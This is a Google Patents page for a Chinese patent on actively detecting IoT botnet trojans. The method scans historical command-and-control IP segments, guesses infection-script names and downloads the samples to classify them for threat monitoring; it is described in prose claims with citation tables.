CN110798439B - Method, equipment and storage medium for actively detecting internet-of-things botnet trojan - Google Patents
Method, equipment and storage medium for actively detecting internet-of-things botnet trojan Download PDFInfo
- Publication number
- CN110798439B CN110798439B CN201811025294.8A CN201811025294A CN110798439B CN 110798439 B CN110798439 B CN 110798439B CN 201811025294 A CN201811025294 A CN 201811025294A CN 110798439 B CN110798439 B CN 110798439B
- Authority
- CN
- China
- Prior art keywords
- trojan
- script
- infection
- information
- internet
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L2463/00—Additional details relating to network architectures or network communication protocols for network security covered by H04L63/00
- H04L2463/144—Detection or countermeasures against botnets
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, wherein the method comprises the steps of obtaining control node information of the internet of things botnet trojans through known internet of things; extracting corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segment to obtain and screen out fingerprint information of an important port; carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set; aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script; and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By the method, the internet of things zombie network trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat information acquisition.
Description
Technical Field
The invention relates to the field of network security, in particular to a method, equipment and a storage medium for actively detecting internet-of-things botnet trojans.
Background
The existing internet-of-things zombie network trojan capturing source is basically obtained by on-site evidence obtaining in an attack stage or captured in a honeypot in an infection stage of a trojan life cycle. The Trojan horse acquired by a field evidence obtaining mode has serious hysteresis and uncertainty; although the whole Internet of things trojans captured by honeypots can be captured early in the infection stage before the evidence is obtained on site, the result still cannot reach the optimal state due to the defects of passive capture and low coverage rate of honeypots, so that the effect of timely early warning of security threat situation is difficult to achieve due to the fact that the honeypots are not aware or even unconscious of the occurrence of security threat events. Therefore, effective coverage rate cannot be achieved by simply depending on site forensics or honeypot Trojan horse capture, a botnet of the Internet of things with high-level threats cannot be monitored in time, and tracing of related network attack events cannot be achieved.
Disclosure of Invention
Based on the problems, the invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, which can be used for acquiring automatic trojan infection scripts in time through actively detecting each port of the internet of things, pre-capturing a sample to the early stage of an infection stage and achieving higher detection coverage rate.
Firstly, the invention provides a method for actively detecting internet of things botnet trojans, which comprises the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides equipment for actively detecting the internet of things botnet trojans, which comprises: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
The device further comprises, before extracting the information of each Trojan control node: and classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises:
the information extraction module is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
the script name dictionary set creation module extracts all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performs duplication removal to serve as a script name dictionary set;
the information sorting module is used for sorting and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
the fingerprint information classification module is used for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
the link extraction module is used for extracting Trojan download links stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module is used for downloading the Trojan according to the Trojan downloading link, detecting and identifying the Trojan, classifying the Trojan and providing information for subsequent Trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
The method has the advantages that the IP network segment scanning detection of the common horse release site of the botnet of the Internet of things can be actively realized through an active detection technology, the automatic Trojan infection script is timely obtained in a blind guessing mode, and the purpose that the sample capture is advanced to the early stage of the infection stage with higher coverage rate is realized. Meanwhile, the main scanning IP network segment object is the historical Internet of things C2 or the IP network segment where the horse-racing station is located, accurate correlation IP/16 network segment scanning is achieved, and scanning efficiency is improved. The method and the process for capturing the internet of things botnet trojans are mainly optimized, and the efficiency and the coverage rate of capturing the internet of things trojans are effectively improved, so that effective information is provided for subsequent monitoring and threat information acquisition of the internet of things botnets.
The invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, wherein the method comprises the steps of obtaining control node information of the internet of things botnet trojans through known internet of things; extracting corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segment to obtain and screen out fingerprint information of an important port; carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set; aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script; and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By the method, the internet of things zombie network trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat information acquisition.
Drawings
In order to more clearly illustrate the technical solutions of the present invention or the prior art, the drawings needed to be used in the description of the embodiments or the prior art will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments described in the present invention, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without creative efforts.
FIG. 1 is a flowchart of an embodiment of a method for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
FIG. 2 is a schematic structural diagram of an apparatus for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
fig. 3 is a schematic structural diagram of a device for actively detecting internet of things botnet trojans.
Detailed Description
In order to make the technical solutions in the embodiments of the present invention better understood and make the above objects, features and advantages of the present invention more comprehensible, the technical solutions of the present invention are described in further detail below with reference to the accompanying drawings.
First, the invention provides a method for actively detecting internet of things botnet trojans, as shown in fig. 1, comprising the following steps:
s101: acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
known internet of things botnet trojans such as Mirai, Gafgyt and other internet of things family botnet trojans frequently used by hackers;
the control node information comprises C2(IP/Domain + Port) hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
s102: extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
s103: classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment; by the method, historical internet of things C2 high-frequency centralized IP network segments can be integrated;
s104: actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
s105: classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
this step can be with key service port fingerprint information data strict screening and the rubbish fingerprint noise of elimination. For example, Apache fingerprint data of an 80 port is focused, accurate information data is provided for later automatic infection script detection, and service fingerprint information data which is not Aparche is eliminated.
S106: carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
s107: aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
the automatic infection scripts store download links URL of the trojans, so that automatic sorting and extraction of the trojan download links in the automatic infection scripts are required to be realized, and the download links are provided for automatic trojan download in the next stage;
s108: and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides equipment for actively detecting the botnet trojans of the internet of things, which comprises the following components as shown in fig. 2: a memory 201 and a processor 202;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
The device further comprises, before extracting the information of each Trojan control node: and classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises the following components as shown in fig. 3:
the information extraction module 301 is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
a script name dictionary set creating module 302 for extracting all infection script file names in the automatic Internet of things Trojan horse infection script download link and removing duplication to serve as a script name dictionary set;
the information sorting module 303 is used for sorting and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module 304 is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
a fingerprint information classification module 305 for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module 306 is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
a link extraction module 307, which extracts the trojan download link stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module 308 downloads the trojan according to the trojan downloading link, detects and identifies the trojan, classifies the trojan, and provides information for subsequent trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
The method has the advantages that the IP network segment scanning detection of the common horse release site of the botnet of the Internet of things can be actively realized through an active detection technology, the automatic Trojan infection script is timely obtained in a blind guessing mode, and the purpose that the sample capture is advanced to the early stage of the infection stage with higher coverage rate is realized. Meanwhile, the main scanning IP network segment object is the historical Internet of things C2 or the IP network segment where the horse-racing station is located, accurate correlation IP/16 network segment scanning is achieved, and scanning efficiency is improved. The method and the process for capturing the internet of things botnet trojans are mainly optimized, and the efficiency and the coverage rate of capturing the internet of things trojans are effectively improved, so that effective information is provided for subsequent monitoring and threat information acquisition of the internet of things botnets.
The invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, wherein the method comprises the steps of obtaining control node information of the internet of things botnet trojans through known internet of things; extracting corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segment to obtain and screen out fingerprint information of an important port; carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set; aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script; and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By the method, the internet of things zombie network trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat information acquisition.
From the above description of the embodiments, it is clear to those skilled in the art that the present invention can be implemented by software plus necessary general hardware platform. With this understanding in mind, the technical solutions of the present invention may be embodied in the form of a software product, which can be stored in a storage medium, or a part thereof that contributes to the prior art.
The embodiments in the present specification are described in a progressive manner, and the same and similar parts among the embodiments are referred to each other, and each embodiment focuses on the differences from the other embodiments. In particular, for the system embodiment, since it is substantially similar to the method embodiment, the description is simple, and for the relevant points, reference may be made to the partial description of the method embodiment.
While the present invention has been described with respect to the embodiments, those skilled in the art will appreciate that there are numerous variations and permutations of the present invention without departing from the spirit of the invention, and it is intended that the appended claims cover such variations and modifications as fall within the true spirit of the invention.
Claims (8)
1. A method for actively detecting Internet of things botnet trojans is characterized by comprising the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
2. The method of claim 1, further comprising, prior to said extracting each trojan control node information: and classifying the Internet of things botnet trojans according to family versions.
3. The method of claim 1, wherein the active full port scanning probing of the high frequency IP network segment to obtain the fingerprint information of the port specifically comprises: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
4. The utility model provides an equipment of thing networking zombie network Trojan is initiatively surveyed which characterized in that includes: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
5. The apparatus as claimed in claim 4, further comprising, before said extracting the respective trojan control node information: and classifying the Internet of things botnet trojans according to family versions.
6. The device according to claim 4, wherein the active full port scanning probing of the high frequency IP network segment to obtain the fingerprint information of the port specifically comprises: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
7. The utility model provides a device of thing networking zombie network Trojan is initiatively surveyed which characterized in that includes:
the information extraction module is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
the script name dictionary set creation module extracts all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performs duplication removal to serve as a script name dictionary set;
the information sorting module is used for sorting and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
the fingerprint information classification module is used for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guess module carries out automatic blind guess of the infection script on the target port with important fingerprint information according to the script name dictionary set, and the automatic blind guess of the infection script specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
the link extraction module is used for extracting Trojan download links stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module is used for downloading the Trojan according to the Trojan downloading link, detecting and identifying the Trojan, classifying the Trojan and providing information for subsequent Trojan monitoring.
8. A non-transitory computer readable storage medium having stored thereon a computer program, which when executed by a processor, implements the method of actively detecting internet of things botnet trojans of any one of claims 1-3.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201811025294.8A CN110798439B (en) | 2018-09-04 | 2018-09-04 | Method, equipment and storage medium for actively detecting internet-of-things botnet trojan |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201811025294.8A CN110798439B (en) | 2018-09-04 | 2018-09-04 | Method, equipment and storage medium for actively detecting internet-of-things botnet trojan |
Publications (2)
Publication Number | Publication Date |
---|---|
CN110798439A CN110798439A (en) | 2020-02-14 |
CN110798439B true CN110798439B (en) | 2022-04-19 |
Family
ID=69425767
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201811025294.8A Active CN110798439B (en) | 2018-09-04 | 2018-09-04 | Method, equipment and storage medium for actively detecting internet-of-things botnet trojan |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN110798439B (en) |
Citations (9)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101651579A (en) * | 2009-09-15 | 2010-02-17 | 成都市华为赛门铁克科技有限公司 | Method and gateway device for identifying Botnet |
CN101673326A (en) * | 2008-09-11 | 2010-03-17 | 北京理工大学 | Method for detecting web page Trojan horse based on program execution characteristics |
CN102546298A (en) * | 2012-01-06 | 2012-07-04 | 北京大学 | Botnet family detection method based on active probing |
CN102955913A (en) * | 2011-08-25 | 2013-03-06 | 腾讯科技(深圳)有限公司 | Method and system for detecting hung Trojans of web page |
CN103973664A (en) * | 2013-01-28 | 2014-08-06 | 信息安全有限公司 | Webshell detection and response system |
CN106603521A (en) * | 2016-12-09 | 2017-04-26 | 北京安天电子设备有限公司 | Network control node detection method and system |
CN106982188A (en) * | 2016-01-15 | 2017-07-25 | 阿里巴巴集团控股有限公司 | The detection method and device in malicious dissemination source |
CN107463844A (en) * | 2016-06-06 | 2017-12-12 | 国家计算机网络与信息安全管理中心 | WEB Trojan detecting methods and system |
CN108156174A (en) * | 2018-01-15 | 2018-06-12 | 深圳市联软科技股份有限公司 | Botnet detection method, device, equipment and medium based on the analysis of C&C domain names |
Family Cites Families (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US9142102B2 (en) * | 2013-07-02 | 2015-09-22 | Icf International | Method and apparatus for visualizing network security alerts |
-
2018
- 2018-09-04 CN CN201811025294.8A patent/CN110798439B/en active Active
Patent Citations (9)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101673326A (en) * | 2008-09-11 | 2010-03-17 | 北京理工大学 | Method for detecting web page Trojan horse based on program execution characteristics |
CN101651579A (en) * | 2009-09-15 | 2010-02-17 | 成都市华为赛门铁克科技有限公司 | Method and gateway device for identifying Botnet |
CN102955913A (en) * | 2011-08-25 | 2013-03-06 | 腾讯科技(深圳)有限公司 | Method and system for detecting hung Trojans of web page |
CN102546298A (en) * | 2012-01-06 | 2012-07-04 | 北京大学 | Botnet family detection method based on active probing |
CN103973664A (en) * | 2013-01-28 | 2014-08-06 | 信息安全有限公司 | Webshell detection and response system |
CN106982188A (en) * | 2016-01-15 | 2017-07-25 | 阿里巴巴集团控股有限公司 | The detection method and device in malicious dissemination source |
CN107463844A (en) * | 2016-06-06 | 2017-12-12 | 国家计算机网络与信息安全管理中心 | WEB Trojan detecting methods and system |
CN106603521A (en) * | 2016-12-09 | 2017-04-26 | 北京安天电子设备有限公司 | Network control node detection method and system |
CN108156174A (en) * | 2018-01-15 | 2018-06-12 | 深圳市联软科技股份有限公司 | Botnet detection method, device, equipment and medium based on the analysis of C&C domain names |
Also Published As
Publication number | Publication date |
---|---|
CN110798439A (en) | 2020-02-14 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN108156174B (en) | Botnet detection method, device, equipment and medium based on C & C domain name analysis | |
US10873594B2 (en) | Test system and method for identifying security vulnerabilities of a device under test | |
CN108768917B (en) | Botnet detection method and system based on weblog | |
CN103685598B (en) | Method and device for discovering active IP address in IPv6 network | |
CN110677438A (en) | Attack chain construction method, device, equipment and medium | |
CN104850780A (en) | Discrimination method for advanced persistent threat attack | |
CN111818103A (en) | Traffic-based tracing attack path method in network target range | |
JP6174520B2 (en) | Malignant communication pattern detection device, malignant communication pattern detection method, and malignant communication pattern detection program | |
JP5739034B1 (en) | Attack detection system, attack detection device, attack detection method, and attack detection program | |
CN111314276A (en) | Method, device and system for detecting multiple attack behaviors | |
CN112818352B (en) | Database detection method and device, storage medium and electronic device | |
CN113901475A (en) | Fuzzy mining method for input verification vulnerability of industrial control terminal equipment | |
CN106911665B (en) | Method and system for identifying malicious code weak password intrusion behavior | |
CN105656730A (en) | Network application quick discovery method and system based on TCP data packet | |
CN109474567B (en) | DDOS attack tracing method and device, storage medium and electronic equipment | |
CN112769635B (en) | Service identification method and device for multi-granularity feature analysis | |
CN112217777A (en) | Attack backtracking method and equipment | |
CN113676497A (en) | Data blocking method and device, electronic equipment and storage medium | |
CN110798439B (en) | Method, equipment and storage medium for actively detecting internet-of-things botnet trojan | |
CN106411951B (en) | Network attack behavior detection method and device | |
CN111885034A (en) | Internet of things attack event tracking method and device and computer equipment | |
CN105827627A (en) | Method and apparatus for acquiring information | |
Hang et al. | “Infect-me-not”: A User-centric and Site-centric Study of web-based malware | |
EP3361405B1 (en) | Enhancement of intrusion detection systems | |
US9049170B2 (en) | Building filter through utilization of automated generation of regular expression |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |